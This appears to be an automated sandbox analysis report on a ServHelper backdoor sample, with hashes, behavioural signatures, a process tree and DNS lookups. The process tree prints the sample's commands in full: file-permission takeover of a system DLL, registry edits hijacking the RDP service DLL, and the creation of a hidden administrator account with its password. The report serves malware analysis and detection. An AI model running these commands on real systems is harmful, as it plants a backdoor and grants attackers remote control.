Analysis
-
max time kernel
142s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-05-2022 19:24
Static task
static1
Behavioral task
behavioral1
Sample
4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
Resource
win10v2004-20220414-en
General
-
Target
4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
-
Size
3.2MB
-
MD5
337e4fd5e423ee5e716ed7ee270bcd00
-
SHA1
6390cf1f9b5a7e5dc3494d603c634e8b5c9b6233
-
SHA256
4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398
-
SHA512
e44814ffdfda11c7f2461b3ec8fa587bf2ca28b8f48b28a9bf103d5a3faf3e5293995c88e8e625eb71f856b5e5160f52ef011a5decd3acd4b1029aa63591e724
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2444 icacls.exe 964 takeown.exe 2952 icacls.exe 3576 icacls.exe 4984 icacls.exe 4160 icacls.exe 4332 icacls.exe 4248 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x0007000000023168-173.dat upx behavioral2/files/0x0007000000023169-174.dat upx -
Loads dropped DLL 2 IoCs
pid Process 2148 Process not Found 2148 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 3576 icacls.exe 4984 icacls.exe 4160 icacls.exe 4332 icacls.exe 4248 icacls.exe 2444 icacls.exe 964 takeown.exe 2952 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4440 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3916 powershell.exe 3916 powershell.exe 4200 powershell.exe 4200 powershell.exe 5032 powershell.exe 5032 powershell.exe 4752 powershell.exe 4752 powershell.exe 3916 powershell.exe 3916 powershell.exe 3916 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 668 Process not Found 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3916 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeRestorePrivilege 3576 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1632 wrote to memory of 3916 1632 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe 81 PID 1632 wrote to memory of 3916 1632 4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe 81 PID 3916 wrote to memory of 3796 3916 powershell.exe 83 PID 3916 wrote to memory of 3796 3916 powershell.exe 83 PID 3796 wrote to memory of 1500 3796 csc.exe 84 PID 3796 wrote to memory of 1500 3796 csc.exe 84 PID 3916 wrote to memory of 4200 3916 powershell.exe 85 PID 3916 wrote to memory of 4200 3916 powershell.exe 85 PID 3916 wrote to memory of 5032 3916 powershell.exe 87 PID 3916 wrote to memory of 5032 3916 powershell.exe 87 PID 3916 wrote to memory of 4752 3916 powershell.exe 89 PID 3916 wrote to memory of 4752 3916 powershell.exe 89 PID 3916 wrote to memory of 964 3916 powershell.exe 97 PID 3916 wrote to memory of 964 3916 powershell.exe 97 PID 3916 wrote to memory of 2952 3916 powershell.exe 98 PID 3916 wrote to memory of 2952 3916 powershell.exe 98 PID 3916 wrote to memory of 3576 3916 powershell.exe 99 PID 3916 wrote to memory of 3576 3916 powershell.exe 99 PID 3916 wrote to memory of 4984 3916 powershell.exe 100 PID 3916 wrote to memory of 4984 3916 powershell.exe 100 PID 3916 wrote to memory of 4160 3916 powershell.exe 101 PID 3916 wrote to memory of 4160 3916 powershell.exe 101 PID 3916 wrote to memory of 4332 3916 powershell.exe 102 PID 3916 wrote to memory of 4332 3916 powershell.exe 102 PID 3916 wrote to memory of 4248 3916 powershell.exe 103 PID 3916 wrote to memory of 4248 3916 powershell.exe 103 PID 3916 wrote to memory of 2444 3916 powershell.exe 104 PID 3916 wrote to memory of 2444 3916 powershell.exe 104 PID 3916 wrote to memory of 2868 3916 powershell.exe 105 PID 3916 wrote to memory of 2868 3916 powershell.exe 105 PID 3916 wrote to memory of 4440 3916 powershell.exe 106 PID 3916 wrote to memory of 4440 3916 powershell.exe 106 PID 3916 wrote to memory of 2392 3916 powershell.exe 107 PID 3916 wrote to memory of 2392 3916 powershell.exe 107 PID 3916 wrote to memory of 3664 3916 powershell.exe 111 PID 3916 wrote to memory of 3664 3916 powershell.exe 111 PID 3664 wrote to memory of 4816 3664 net.exe 112 PID 3664 wrote to memory of 4816 3664 net.exe 112 PID 3916 wrote to memory of 4972 3916 powershell.exe 113 PID 3916 wrote to memory of 4972 3916 powershell.exe 113 PID 4972 wrote to memory of 2600 4972 cmd.exe 114 PID 4972 wrote to memory of 2600 4972 cmd.exe 114 PID 2600 wrote to memory of 5064 2600 cmd.exe 115 PID 2600 wrote to memory of 5064 2600 cmd.exe 115 PID 5064 wrote to memory of 1608 5064 net.exe 116 PID 5064 wrote to memory of 1608 5064 net.exe 116 PID 3916 wrote to memory of 1848 3916 powershell.exe 117 PID 3916 wrote to memory of 1848 3916 powershell.exe 117 PID 1848 wrote to memory of 4580 1848 cmd.exe 118 PID 1848 wrote to memory of 4580 1848 cmd.exe 118 PID 4580 wrote to memory of 1016 4580 cmd.exe 119 PID 4580 wrote to memory of 1016 4580 cmd.exe 119 PID 1016 wrote to memory of 5056 1016 net.exe 120 PID 1016 wrote to memory of 5056 1016 net.exe 120 PID 3708 wrote to memory of 3928 3708 cmd.exe 124 PID 3708 wrote to memory of 3928 3708 cmd.exe 124 PID 3928 wrote to memory of 2488 3928 net.exe 125 PID 3928 wrote to memory of 2488 3928 net.exe 125 PID 4936 wrote to memory of 2844 4936 cmd.exe 128 PID 4936 wrote to memory of 2844 4936 cmd.exe 128 PID 2844 wrote to memory of 1712 2844 net.exe 129 PID 2844 wrote to memory of 1712 2844 net.exe 129 PID 3916 wrote to memory of 1616 3916 powershell.exe 130 PID 3916 wrote to memory of 1616 3916 powershell.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe"C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB693.tmp" "c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP"4⤵PID:1500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:964
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2952
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4984
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4160
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4332
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4248
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2444
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2868
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4440
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2392
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:4816
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1608
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:5056
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1616
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc pd21abwo /add1⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc pd21abwo /add2⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc pd21abwo /add3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:3952
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:4952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD1⤵PID:5060
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD2⤵PID:204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD3⤵PID:872
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:3040
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:3248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1384
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc pd21abwo1⤵PID:3264
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc pd21abwo2⤵PID:4008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc pd21abwo3⤵PID:2516
-
-
Network
-
Remote address:8.8.8.8:53Request96.108.152.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpetrovich.xyzIN AResponsepetrovich.xyzIN A188.114.97.0petrovich.xyzIN A188.114.96.0
-
322 B 7
-
322 B 7
-
322 B 7
-
1.5kB 6.2kB 15 17
-
46 B 40 B 1 1
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD55f612d9087b8bcadb4002e6b026990e8
SHA1b5f343e569abb0849c06e3d77d00cc1bd2d5f589
SHA256838be164025509d2c4dd005aabf7bbca522b703e931d9c21fb287b5f06178450
SHA512d5e3e0eeb9b4d3f7ceeba19bc83669258d77d6f973e90049d8cb2796e3f0f6502209e1863ba0a0c7d69b1cc3c0a43e74b9efd0557854ac349f3ffc51d6ea1c59
-
Filesize
1KB
MD5c439285bbde55b677c096447745ccd29
SHA1ffec0b5e55ed349b6b9938a8e4a04767d50c3ff1
SHA256c674812c663d4cdf0e8e0d18dc54f291079d206332a96a857512ccaa71330061
SHA512be41a39cf6507d4684f0243262ba98893b8eadde92363fadb82cd3a63a04ef443c0e4e0c4caf7f55ab9560d7dfc672d8172f79fdbe17a686d82ba85cf77c2f87
-
Filesize
3.0MB
MD5031d92d079edd02c5f34248e9bf03ff6
SHA1736e40d6cde2566fb5d976cb1d7172e6acb8bd12
SHA256ab89298954e80cea1c73937cb628874832ab9d45c6d3be9dde40c4a4aae82ad2
SHA5125bf6934556f451d35303e50e03b5a74a4b74d58b836f15c3cc3356b0b9e1a2bff6867153c63537f5fc942d346850bc9d2a34cf509d6c5b4d13d9021eefce39f5
-
Filesize
3KB
MD5cb9e39baafea02d62d0c9252a81e8e7c
SHA1ce60b8f72ed39b8b78af22be04cbbe7ff5b85d77
SHA256251c5247ede2f35abe3c3ff497a0a2dd8a4081371ceefa28120556722e9009b2
SHA5125c9eba6ae4c8a559fe72a48329d49fa057926f28be5737cab07b2a0524c035975d518cc294d14809ddc9ef3f3484f4233f9388b63ea127edd82e9ef48c986db3
-
Filesize
54KB
MD540bf8ddb2544e110ff0f368fdb0f34ba
SHA1a9a0ed994500563a1b45b7748d76ab522d9f870f
SHA25621bebaf9f55e1288bea72cf10645536d3b62599973cb48adb3f4d3c9e0d450a7
SHA5128e3583b868d3a9ac1f992dfa555fe2ab60934ff76e35c751b8e8ca13d94ded40e02f47ff9074c19fea48bf68a02e21fef87c0b75a385aae53d41184b475e7ac5
-
Filesize
944KB
MD5dc99adf951d836bbac2b6e729555c3b7
SHA1f3c6f96a3ae48e4048771bc070f427c0d7353d60
SHA2560157d803e2b1b8a43236d08aa8f8f80d3afd629d822bb901fb712192e7aa90be
SHA5123eff38448e3a5b9328643e1f96873c126b470ec4d576f5504f8c1abe1bf6800b662cd97d12979cdffdca13e9410a01a5390a2dd0f27b9c9a0c083d953690955f
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5bf64c714dc1375e66b9e64e2b54cd4c5
SHA1579f954358037eb68c91dcaafcf2ef394d11d04d
SHA256d8ae1460c1acea4ba0ad40432d81119004e7e2ad4d7d035e696d6a41a522fb23
SHA512abecf88ab8fdd7bfc115b277260d554a011594bb62078d919501118b48f7ee5b5ce8a48963f4aebe00db84a0f1488176594d502010ce94cdcd9d10c9dbe86a77
-
Filesize
504B
MD58e55cb0ca998472ab6d3e295e0c4dd50
SHA1407d07a29b89fc3afc246c0680d5857e3f51019d
SHA25663e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
SHA512c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
-
Filesize
369B
MD512524ccc3bc37bbe35e7b5963d148cfa
SHA16a7b17fd989b22ad6b88607f03ed0b8e86e77439
SHA25659b6b333ee73158564f2df7b5b493623930ef1f2affd9e50afcb60d9db6ab722
SHA5128357b5f82c51d908986db8b1a5e2b6e0c782c2ec3848856183d706336ba0e2e8fc7458410febc195de464a32d76d4042132ae8706a59aa69abed8d65ba82944f